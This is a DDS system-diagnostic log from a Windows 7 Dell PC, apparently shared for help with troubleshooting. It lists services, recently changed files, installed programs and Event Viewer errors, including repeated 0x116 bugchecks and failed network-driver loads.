R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2012-6-28 95248]
R3 AvastVBoxSvc;AvastVBox COM Service;C:\Security\Avast\ng\vbox\AvastVBoxSVC.exe [2014-11-28 4012248]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;C:\Windows\System32\drivers\btath_a2dp.sys [2011-12-29 338592]
R3 btath_avdt;Atheros Bluetooth AVDT Service;C:\Windows\System32\drivers\btath_avdt.sys [2011-12-29 110752]
R3 BTATH_BUS;Atheros Bluetooth Bus;C:\Windows\System32\drivers\btath_bus.sys [2011-12-29 30368]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;C:\Windows\System32\drivers\btath_hcrp.sys [2011-12-29 167584]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;C:\Windows\System32\drivers\btath_lwflt.sys [2011-12-29 68256]
R3 BTATH_RCP;Bluetooth AVRCP Device;C:\Windows\System32\drivers\btath_rcp.sys [2011-12-29 280992]
R3 BtFilter;BtFilter;C:\Windows\System32\drivers\btfilter.sys [2011-12-29 548000]
R3 IntcDAud;Intel® Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2012-6-28 331264]
R3 iusb3hub;Intel® USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2012-6-28 356120]
R3 iusb3xhc;Intel® USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2012-6-28 787736]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2012-6-28 648808]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 DellDigitalDelivery;Dell Digital Delivery Service;C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [2011-10-26 162816]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 BBSvc;Bing Bar Update Service;C:\Program Files (x86)\Microsoft\BingBar\BBSvc.EXE [2011-6-7 191752]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-12-10 114688]
S3 pmxdrv;pmxdrv;C:\Windows\System32\drivers\pmxdrv.sys [2012-11-2 31152]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2014-10-17 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2014-10-17 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2014-10-17 30208]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2014-7-28 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-7-2 1255736]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2014-12-26 08:14:01 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{81D8652A-BEBF-4F40-8D07-92F40ED57EBB}\offreg.dll
2014-12-26 08:13:36 11870360 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{81D8652A-BEBF-4F40-8D07-92F40ED57EBB}\mpengine.dll
2014-12-17 18:31:52 144384 ------w- C:\Windows\System32\ieUnatt.exe
2014-12-17 18:31:52 115712 ------w- C:\Windows\SysWow64\ieUnatt.exe
2014-12-11 08:20:01 -------- d-----w- C:\Windows\System32\appraiser
2014-12-11 08:01:22 4121600 ------w- C:\Windows\System32\mf.dll
2014-12-11 08:01:22 3209728 ------w- C:\Windows\SysWow64\mf.dll
2014-12-10 11:19:23 830976 ------w- C:\Windows\System32\appraiser.dll
2014-12-10 11:19:23 741376 ------w- C:\Windows\System32\invagent.dll
2014-12-10 11:19:23 413184 ------w- C:\Windows\System32\generaltel.dll
2014-12-10 11:19:23 396800 ------w- C:\Windows\System32\devinv.dll
2014-12-10 11:19:23 192000 ------w- C:\Windows\System32\aepic.dll
2014-12-10 11:19:23 1232040 ------w- C:\Windows\System32\aitstatic.exe
2014-12-10 11:19:23 1083392 ------w- C:\Windows\System32\aeinv.dll
2014-12-10 11:19:22 227328 ------w- C:\Windows\System32\aepdu.dll
2014-12-10 11:14:13 346624 ------w- C:\Windows\System32\WSManMigrationPlugin.dll
2014-12-06 21:01:12 -------- d-----w- C:\Users\anonymous\AppData\Roaming\PCDr
2014-12-06 21:01:04 -------- d-----w- C:\ProgramData\PCDr
2014-12-06 19:30:41 -------- d-----w- C:\AdwCleaner
2014-12-05 22:48:56 -------- d-----w- C:\photos - digital 7
2014-12-03 18:06:20 188304 ------w- C:\Program Files (x86)\Mozilla Firefox\Plugins\nppdf32.dll
2014-12-03 18:06:20 188304 ------w- C:\Program Files (x86)\Internet Explorer\Plugins\nppdf32.dll
2014-11-29 00:14:48 -------- d-----w- C:\Windows\SysWow64\vbox
2014-11-29 00:14:48 -------- d-----w- C:\Windows\System32\vbox
2014-11-29 00:11:21 43152 ------w- C:\Windows\avastSS.scr
.
==================== Find3M  ====================
.
2014-12-28 00:45:17 129752 ------w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-12-10 13:08:05 71344 ------w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-12-10 13:08:05 701104 ------w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-11-29 00:11:28 1050432 ------w- C:\Windows\System32\drivers\aswsnx.sys
2014-11-29 00:11:22 93568 ------w- C:\Windows\System32\drivers\aswRdr2.sys
2014-11-29 00:11:22 83280 ------w- C:\Windows\System32\drivers\aswMonFlt.sys
2014-11-29 00:11:22 65776 ------w- C:\Windows\System32\drivers\aswRvrt.sys
2014-11-29 00:11:22 29208 ------w- C:\Windows\System32\drivers\aswHwid.sys
2014-11-29 00:11:22 267632 ------w- C:\Windows\System32\drivers\aswVmm.sys
2014-11-29 00:11:22 116728 ------w- C:\Windows\System32\drivers\aswstm.sys
2014-11-24 19:04:56 275080 ------w- C:\Windows\System32\MpSigStub.exe
2014-11-22 03:06:23 2724864 ------w- C:\Windows\System32\mshtml.tlb
2014-11-22 03:06:11 4096 ------w- C:\Windows\System32\ieetwcollectorres.dll
2014-11-22 02:50:39 66560 ------w- C:\Windows\System32\iesetup.dll
2014-11-22 02:50:10 580096 ------w- C:\Windows\System32\vbscript.dll
2014-11-22 02:49:54 48640 ------w- C:\Windows\System32\ieetwproxystub.dll
2014-11-22 02:48:20 88064 ------w- C:\Windows\System32\MshtmlDac.dll
2014-11-22 02:35:29 114688 ------w- C:\Windows\System32\ieetwcollector.exe
2014-11-22 02:34:51 814080 ------w- C:\Windows\System32\jscript9diag.dll
2014-11-22 02:34:07 6039552 ------w- C:\Windows\System32\jscript9.dll
2014-11-22 02:26:31 968704 ------w- C:\Windows\System32\MsSpellCheckingFacility.exe
2014-11-22 02:20:44 2724864 ------w- C:\Windows\SysWow64\mshtml.tlb
2014-11-22 02:14:16 77824 ------w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-11-22 02:07:43 501248 ------w- C:\Windows\SysWow64\vbscript.dll
2014-11-22 02:07:17 62464 ------w- C:\Windows\SysWow64\iesetup.dll
2014-11-22 02:06:32 47616 ------w- C:\Windows\SysWow64\ieetwproxystub.dll
2014-11-22 02:05:02 64000 ------w- C:\Windows\SysWow64\MshtmlDac.dll
2014-11-22 01:54:30 620032 ------w- C:\Windows\SysWow64\jscript9diag.dll
2014-11-22 01:47:10 1359360 ------w- C:\Windows\System32\mshtmlmedia.dll
2014-11-22 01:46:58 2125312 ------w- C:\Windows\System32\inetcpl.cpl
2014-11-22 01:40:04 60416 ------w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-11-22 01:29:26 4299264 ------w- C:\Windows\SysWow64\jscript9.dll
2014-11-22 01:28:21 2358272 ------w- C:\Windows\System32\wininet.dll
2014-11-22 01:22:49 2052096 ------w- C:\Windows\SysWow64\inetcpl.cpl
2014-11-22 01:21:57 1155072 ------w- C:\Windows\SysWow64\mshtmlmedia.dll
2014-11-22 01:00:20 1888256 ------w- C:\Windows\SysWow64\wininet.dll
2014-11-21 11:14:22 63704 ------w- C:\Windows\System32\drivers\mwac.sys
2014-11-21 11:14:12 93400 ------w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-11-21 11:14:08 25816 ------w- C:\Windows\System32\drivers\mbam.sys
2014-11-19 09:31:16 1217192 ------w- C:\Windows\SysWow64\FM20.DLL
2014-11-11 03:09:06 1424384 ------w- C:\Windows\System32\WindowsCodecs.dll
2014-11-11 03:08:52 241152 ------w- C:\Windows\System32\pku2u.dll
2014-11-11 03:08:48 728064 ------w- C:\Windows\System32\kerberos.dll
2014-11-11 02:44:45 1230336 ------w- C:\Windows\SysWow64\WindowsCodecs.dll
2014-11-11 02:44:32 186880 ------w- C:\Windows\SysWow64\pku2u.dll
2014-11-11 02:44:25 550912 ------w- C:\Windows\SysWow64\kerberos.dll
2014-11-11 01:46:26 119296 ------w- C:\Windows\System32\drivers\tdx.sys
2014-11-08 03:16:08 2048 ------w- C:\Windows\System32\tzres.dll
2014-11-08 02:45:09 2048 ------w- C:\Windows\SysWow64\tzres.dll
2014-10-30 02:03:43 165888 ------w- C:\Windows\System32\charmap.exe
2014-10-30 01:45:43 155136 ------w- C:\Windows\SysWow64\charmap.exe
2014-10-25 01:57:59 77824 ------w- C:\Windows\System32\packager.dll
2014-10-25 01:32:37 67584 ------w- C:\Windows\SysWow64\packager.dll
2014-10-18 02:05:23 861696 ------w- C:\Windows\System32\oleaut32.dll
2014-10-18 01:33:18 571904 ------w- C:\Windows\SysWow64\oleaut32.dll
2014-10-14 02:16:37 155064 ------w- C:\Windows\System32\drivers\ksecpkg.sys
2014-10-14 02:13:06 683520 ------w- C:\Windows\System32\termsrv.dll
2014-10-14 02:13:00 3241984 ------w- C:\Windows\System32\msi.dll
2014-10-14 02:12:57 1460736 ------w- C:\Windows\System32\lsasrv.dll
2014-10-14 02:09:31 146432 ------w- C:\Windows\System32\msaudite.dll
2014-10-14 02:07:31 681984 ------w- C:\Windows\System32\adtschema.dll
2014-10-14 01:50:47 22016 ------w- C:\Windows\SysWow64\secur32.dll
2014-10-14 01:50:41 2363904 ------w- C:\Windows\SysWow64\msi.dll
2014-10-14 01:49:38 96768 ------w- C:\Windows\SysWow64\sspicli.dll
2014-10-14 01:47:30 146432 ------w- C:\Windows\SysWow64\msaudite.dll
2014-10-14 01:46:02 681984 ------w- C:\Windows\SysWow64\adtschema.dll
2014-10-10 00:57:42 3198976 ------w- C:\Windows\System32\win32k.sys
2014-10-03 02:12:23 310272 ------w- C:\Windows\System32\WsmWmiPl.dll
2014-10-03 02:12:23 2020352 ------w- C:\Windows\System32\WsmSvc.dll
2014-10-03 02:12:22 181248 ------w- C:\Windows\System32\WsmAuto.dll
2014-10-03 02:12:00 500224 ------w- C:\Windows\System32\AUDIOKSE.dll
2014-10-03 02:11:54 284672 ------w- C:\Windows\System32\EncDump.dll
2014-10-03 02:11:51 680960 ------w- C:\Windows\System32\audiosrv.dll
2014-10-03 02:11:51 440832 ------w- C:\Windows\System32\AudioEng.dll
2014-10-03 02:11:51 296448 ------w- C:\Windows\System32\AudioSes.dll
2014-10-03 02:11:49 266240 ------w- C:\Windows\System32\WSManHTTPConfig.exe
2014-10-03 01:45:03 248832 ------w- C:\Windows\SysWow64\WSManMigrationPlugin.dll
2014-10-03 01:45:03 214016 ------w- C:\Windows\SysWow64\WsmWmiPl.dll
2014-10-03 01:45:03 145920 ------w- C:\Windows\SysWow64\WsmAuto.dll
2014-10-03 01:45:03 1177088 ------w- C:\Windows\SysWow64\WsmSvc.dll
2014-10-03 01:44:42 442880 ------w- C:\Windows\SysWow64\AUDIOKSE.dll
2014-10-03 01:44:26 374784 ------w- C:\Windows\SysWow64\AudioEng.dll
2014-10-03 01:44:26 195584 ------w- C:\Windows\SysWow64\AudioSes.dll
2014-10-03 01:44:25 198656 ------w- C:\Windows\SysWow64\WSManHTTPConfig.exe
2014-10-02 18:23:20 94208 ------w- C:\Windows\SysWow64\QuickTimeVR.qtx
2014-10-02 18:23:20 69632 ------w- C:\Windows\SysWow64\QuickTime.qts
.
============= FINISH:  8:57:13.72 ===============
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 6/30/2012 3:48:46 PM
System Uptime: 12/28/2014 8:06:08 AM (0 hours ago)
.
Motherboard: Dell Inc. |  | 0YJPT1
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz | CPU 1 | 3401/100mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 1851 GiB total, 1516.787 GiB free.
D: is CDROM ()
E: is Removable
F: is Removable
G: is Removable
H: is Removable
J: is FIXED (NTFS) - 1863 GiB total, 709.154 GiB free.
L: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP324: 11/4/2014 5:01:06 AM - Windows Update
RP325: 11/7/2014 5:09:00 AM - Windows Update
RP326: 11/11/2014 2:46:40 AM - Windows Update
RP327: 11/12/2014 3:00:17 AM - Windows Update
RP328: 11/18/2014 4:58:37 AM - Windows Update
RP329: 11/19/2014 3:00:11 AM - Windows Update
RP330: 11/25/2014 5:01:14 AM - Windows Update
RP331: 11/28/2014 7:09:43 PM - avast! antivirus system restore point
RP332: 12/2/2014 3:22:58 AM - Windows Update
RP333: 12/9/2014 5:40:04 AM - Windows Update
RP334: 12/10/2014 4:42:32 AM - Spybot-S&D Spyware removal
RP335: 12/11/2014 3:00:18 AM - Windows Update
RP336: 12/12/2014 3:00:10 AM - Windows Update
RP337: 12/16/2014 3:13:39 AM - Windows Update
RP338: 12/18/2014 3:00:10 AM - Windows Update
RP339: 12/23/2014 3:13:33 AM - Windows Update
.
==== Installed Programs ======================
.
64 Bit HP CIO Components Installer
Accidental Damage Services Agreement
Acronis True Image Home
Adobe AIR
Adobe Community Help
Adobe Download Assistant
Adobe Flash Player 15 ActiveX
Adobe Flash Player 15 Plugin
Adobe Photoshop Elements 10
Adobe Photoshop.com Inspiration Browser
Adobe Reader X (10.1.13) MUI
Ahnenblatt 2.70
AMD APP SDK Runtime
AMD AVIVO64 Codecs
AMD Catalyst Install Manager
ANT Drivers Installer x64
AOL Uninstaller (Choose which Products to Remove)
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ArcSoft PhotoStudio 6
Atheros Bluetooth Suite (64)
Avast Free Antivirus
Bing Bar
Bonjour
BufferChm
C4600
Canon CanoScan 9000F User Registration
Canon MP Navigator EX 3.1
Canon Utilities Solution Menu
CanoScan 9000F Scanner Driver
Catalyst Control Center
Catalyst Control Center - Branding
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
CCleaner
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
Citrix Authentication Manager
Citrix Receiver
Citrix Receiver (HDX Flash Redirection)
Citrix Receiver Inside
Citrix Receiver Updater
Citrix Receiver(Aero)
Citrix Receiver(DV)
Citrix Receiver(USB)
Consumer In-Home Service Agreement
D3DX10
Definition Update for Microsoft Office 2010 (KB2910899) 32-Bit Edition
Dell DataSafe Local Backup
Dell DataSafe Local Backup - Support Software
Dell DataSafe Online
Dell Digital Delivery
Dell Edoc Viewer
Dell WLAN and Bluetooth Client Installation
Destinations
DeviceDiscovery
eBay
Elements 10 Organizer
Elevated Installer
Eraser 6.0.10.2620
Exif Tag Remover 4.3
Flash Cookie Cleaner
Garmin Communicator Plugin x64
Garmin Express
Garmin Express Tray
Genie Backup Manager
GIMP 2.8.6
Google Update Helper
GoToAssist Corporate
GPBaseService2
HP Customer Participation Program 13.0
HP Imaging Device Functions 13.0
HP Photosmart C4600 All-In-One Driver Software 13.0 Rel .5
HP Print Projects 1.0
HP Smart Web Printing 4.5
HP Solution Center 13.0
HP Update
HPPhotoGadget
hpPrintProjects
HPProductAssistant
HPSSupply
hpWLPGInstaller
Intel® Control Center
Intel® Manageability Engine Firmware Recovery Agent
Intel® Management Engine Components
Intel® Rapid Storage Technology
Intel® USB 3.0 eXtensible Host Controller Driver
Intel® Trusted Connect Service Client
IrfanView (remove only)
iTunes
Junk Mail filter update
Malwarebytes Anti-Malware version 2.0.4.1028
MarketResearch
Mesh Runtime
Microsoft .NET Framework 4.5.1
Microsoft Application Error Reporting
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Home and Student 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Single Image 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft VC9 runtime libraries
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005
Mozilla Firefox 31.0 (x86 en-US)
Mozilla Maintenance Service
Mozilla Thunderbird 31.2.0 (x86 en-US)
MSVCRT
MSVCRT_amd64
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
Multimedia Card Reader
My Dell
Nero Burning ROM
Nero Burning ROM Help (CHM)
Nero BurningROM 12
Nero ControlCenter
Nero ControlCenter Help (CHM)
Nero Core Components
Nero Prerequisite Installer 2.0
Nero SharedVideoCodecs
Nero Update
Nikon Message Center 2
Nikon Movie Editor
Online Plug-in
Picture Control Utility x64
Prerequisite installer
PS_AIO_05_C4600_Software_Min
PSE10 STI Installer
Quicken WillMaker Plus 2013
QuickTime 7
Realtek High Definition Audio Driver
Scan
Security Update for Microsoft .NET Framework 4.5.1 (KB2894854v2)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft .NET Framework 4.5.1 (KB2931368)
Security Update for Microsoft .NET Framework 4.5.1 (KB2972107)
Security Update for Microsoft .NET Framework 4.5.1 (KB2972216)
Security Update for Microsoft .NET Framework 4.5.1 (KB2978128)
Security Update for Microsoft .NET Framework 4.5.1 (KB2979578v2)
Security Update for Microsoft Excel 2010 (KB2910902) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553154) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2881071) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2899519) 32-Bit Edition
Self-service Plug-in
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Shop for HP Supplies
Skype™ 6.11
SmartWebPrinting
SolutionCenter
Spybot - Search & Destroy
Status
Stream-Cloner V2.10 Build 301
Toolbox
TouchCopy 11
TouchCopy 12
TrayApp
TrueCrypt
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Excel 2010 (KB2589348) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553140) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589386) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597089) 32-Bit Edition
Update for Microsoft Office 2010 (KB2687275) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837602) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition
Update for Microsoft Office 2010 (KB2883019) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889818) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889828) 32-Bit Edition
Update for Microsoft Office 2010 (KB2910896) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2597088) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2880517) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
ViewNX 2
VLC media player 2.1.3
WebReg
WinCalendar V4
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1)
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Mesh ActiveX Control for Remote Connections
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
WinZip
Yahoo! Toolbar
.
==== Event Viewer Messages From Past Week ========
.
12/28/2014 8:09:10 AM, Error: Service Control Manager [7034]  - The Dell Digital Delivery Service service terminated unexpectedly.  It has done this 1 time(s).
12/28/2014 8:06:53 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8016c574e0, 0xfffff880056b5910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-30045-01.
12/28/2014 7:55:52 AM, Error: Schannel [36888]  - The following fatal alert was generated: 40. The internal error state is 252.
12/28/2014 7:50:13 AM, Error: Schannel [36887]  - The following fatal alert was received: 20.
12/28/2014 5:55:44 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801bcf2010, 0xfffff88005221910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-21481-01.
12/28/2014 5:13:34 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa8016e724e0, 0xfffff8800520c910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-24850-01.
12/28/2014 5:06:18 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801c7c8010, 0xfffff880056b8910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-27705-01.
12/28/2014 4:35:07 AM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801dbfd1e0, 0xfffff8800567a910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122814-29936-01.
12/27/2014 7:36:39 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service stisvc with arguments "" in order to run the server: {A1F4E726-8CF1-11D1-BF92-0060081ED811}
12/27/2014 7:26:27 PM, Error: Service Control Manager [7001]  - The Network List Service service depends on the Network Location Awareness service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:26:27 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
12/27/2014 7:26:27 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netprofm with arguments "" in order to run the server: {A47979D2-C419-11D9-A5B4-001185AD2B89}
12/27/2014 7:26:27 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1068" attempting to start the service netman with arguments "" in order to run the server: {BA126AD1-2166-11D1-B1D0-00805FC1270E}
12/27/2014 7:26:26 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server: {9E175B6D-F52A-11D8-B9A5-505054503030}
12/27/2014 7:26:25 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service EventSystem with arguments "" in order to run the server: {1BE1F766-5536-11D1-B726-00C04FB926AF}
12/27/2014 7:26:20 PM, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC}
12/27/2014 7:25:35 PM, Error: Microsoft-Windows-WER-SystemErrorReporting [1001]  - The computer has rebooted from a bugcheck.  The bugcheck was: 0x00000116 (0xfffffa801794c1d0, 0xfffff880052fe910, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 122714-19219-01.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  AFD aswRdr aswRvrt aswSnx aswSP aswVmm DfsC discache NetBIOS NetBT nsiproxy Psched rdbss spldr tdx truecrypt vwififlt Wanarpv6 WfpLwf
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The Workstation service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The TCP/IP NetBIOS Helper service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The SMB MiniRedirector Wrapper and Engine service depends on the Redirected Buffering Sub Sysytem service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The SMB 2.0 MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The SMB 1.x MiniRedirector service depends on the SMB MiniRedirector Wrapper and Engine service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The Network Store Interface Service service depends on the NSI proxy service driver. service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The Network Location Awareness service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The IP Helper service depends on the Network Store Interface Service service which failed to start because of the following error:  The dependency service or group failed to start.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The DNS Client service depends on the NetIO Legacy TDI Support Driver service which failed to start because of the following error:  A device attached to the system is not functioning.
12/27/2014 7:25:27 PM, Error: Service Control Manager [7001]  - The DHCP Client service depends on the Ancillary Function Driver for Winsock service which failed to start because of the following error:  A device attached to the system is not functioning.
